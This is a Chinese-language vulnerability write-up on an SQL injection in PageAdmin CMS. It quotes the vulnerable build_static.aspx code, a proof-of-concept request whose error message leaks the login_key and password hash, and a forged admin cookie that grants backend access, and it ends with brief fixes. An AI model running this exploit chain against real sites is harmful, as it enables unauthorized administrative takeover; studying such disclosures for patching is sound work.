PageAdmin CMS最新版SQL注入
#1 一个越权 /e/master/build_static.aspx
?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
protected void Page_Load(Object src,EventArgs e)
{
Ids=Request.QueryString[“ids”];
Table=Request.QueryString[“table”];
Conn Myconn=new Conn();
conn=Myconn.OleDbConn();//获取OleDbConnection
switch(Table)
{
case “pa_zt”:
Build_Lanmu();
break;
case “pa_zt_sublanmu”:
Build_SubLanmu();
break;
case “pa_lanmu”:
Build_Lanmu();
break;
case “pa_sublanmu”:
Build_SubLanmu();
break;
default:
Build_Detail();
break;
}
}
#2 注入点
?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
private void Build_Detail()
{
conn.Open();
if(Ids!=null && IsNum(Ids.Replace(“,”,””)))
{
Build_Html BH=new Build_Html();
if(IsNum(Ids))
{
sql=”select id,site_dir,static_dir,static_file,lanmu_id,sublanmu_id from “+Table+” where html=2 and id=”+Ids;
}
else
{
sql=”select id,site_dir,static_dir,static_file,lanmu_id,sublanmu_id from “+Table+” where html=2 and id in(“+Ids+”)”;
}
OleDbCommand comm=new OleDbCommand(sql,conn);
OleDbDataReader dr=comm.ExecuteReader();
while(dr.Read())
{
try
{
BH.Build_Detail(dr[“site_dir”].ToString(),dr[“static_dir”].ToString(),dr[“static_file”].ToString(),dr[“lanmu_id”].ToString(),dr[“sublanmu_id”].ToString(),dr[“id”].ToString());
}
catch(Exception e)
{
LocalUrl=”http://”+Request.ServerVariables[“SERVER_NAME”]+”:”+Request.ServerVariables[“SERVER_PORT”];
SiteDir=dr[“site_dir”].ToString();
SiteDir=(SiteDir==””?”/”:(“/”+SiteDir+”/”));
ErrorUrl=LocalUrl+SiteDir+”index.aspx?lanmuid=”+dr[“lanmu_id”].ToString()+”&sublanmuid=”+dr[“sublanmu_id”].ToString()+”&id=”+dr[“id”].ToString();
Response.Write(ErrorUrl+”生成失败:”+e.Message);
Response.End();
break;
}
}
dr.Close();
conn.Close();
Response.Write(“success”);
Response.End();
}
Response.Write(“Invalid Ids”);
Response.End();
}
其中Table参数可构造:
?
1
sql=”select id,site_dir,static_dir,static_file,lanmu_id,sublanmu_id from “+Table+” where html=2 and id=”+Ids;
且会产生错误回显:
?
1
2
ErrorUrl=LocalUrl+SiteDir+”index.aspx?lanmuid=”+dr[“lanmu_id”].ToString()+”&sublanmuid=”+dr[“sublanmu_id”].ToString()+”&id=”+dr[“id”].ToString();
Response.Write(ErrorUrl+”生成失败:”+e.Message);
#3 构造请求可得到login_key(见POC),鉴权cookie中的valicate由以下代码生成,且LoginKey被存入数据库login_key字段:
?
1
2
3
4
5
6
7
string LoginKey=Guid.NewGuid().ToString(“N”)+LoginDate.AddSeconds(r.Next(1,2592000)).ToString(“yyMMddHHmmss”);
Md5 Jm=new Md5();
HttpCookie MCookie=new HttpCookie(“Member”);
MCookie.Values.Add(“UID”,UID);
MCookie.Values.Add(“Valicate”,Jm.Get_Md5(LoginKey));
Response.AppendCookie(MCookie);
Update_Member(UID,LoginDate,LoginKey);
#4 利用本地pageadmin环境进行login_key的加密:
?
1
2
3
新建test.aspx<% @ Import NameSpace=”System.Data.OleDb”%>
<% @ Import NameSpace=”PageAdmin”%>
#5伪造cookie即可进入后台
?
1
2
**.**.**.** FALSE / FALSE Master UID=2&Valicate=abd2128c766f990f7b4ec19c137e452117db
**.**.**.** FALSE / ALSE SiteId1
#1使用poc获取报错
?
1
http://**.**.**.**:80/2/index.aspx?lanmuid=bae915239122142b5101e319cf516ef3e371121&sublanmuid=f3fac35c66184f9281b221fa41ddbf59_160123191804&id=2生成失败:The remote server returned an error: (404) Not Found.
其中sublanmuid的值为login_key,lanmuid的值为密码
#2得到加密后的valicate
abd2128c766f990f7b4ec19c137e452117db
#3伪造cookie进入后台
解决方案:
#1 页面鉴权
#2 sql_format